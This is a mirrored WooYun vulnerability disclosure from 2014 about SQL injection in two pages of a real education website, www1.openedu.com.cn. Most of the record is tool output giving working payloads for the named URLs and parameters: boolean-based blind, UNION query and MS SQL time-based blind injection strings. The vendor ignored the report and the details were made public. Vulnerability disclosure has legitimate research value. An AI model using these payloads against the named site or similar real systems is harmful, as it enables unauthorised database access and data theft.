乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-19: 细节已通知厂商并且等待厂商处理中 2014-06-24: 厂商已经主动忽略漏洞,细节向公众公开
RT
多处SQL注射,举例:http://www1.openedu.com.cn/ycjy/fengmian_new.php?id=447&mid=132&dbname=fengmain
Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=447 AND 1204=1204&mid=132&dbname=fengmain Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=-1089 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(113)+CHAR(121)+CHAR(111)+CHAR(113)+CHAR(116)+CHAR(79)+CHAR(66)+CHAR(113)+CHAR(100)+CHAR(113)+CHAR(66)+CHAR(97)+CHAR(117)+CHAR(100)+CHAR(113)+CHAR(116)+CHAR(112)+CHAR(101)+CHAR(113),NULL,NULL,NULL-- &mid=132&dbname=fengmain Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: id=447 AND 3287=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&mid=132&dbname=fengmain
http://www1.openedu.com.cn/file_post/display/read.php?FileID=21696
Place: GETParameter: FileID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: FileID=21696 AND 7547=7547 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: FileID=21696 AND 1236=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers ASsys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
SQL过滤
危害等级:无影响厂商忽略
忽略时间:2014-06-24 09:18
暂无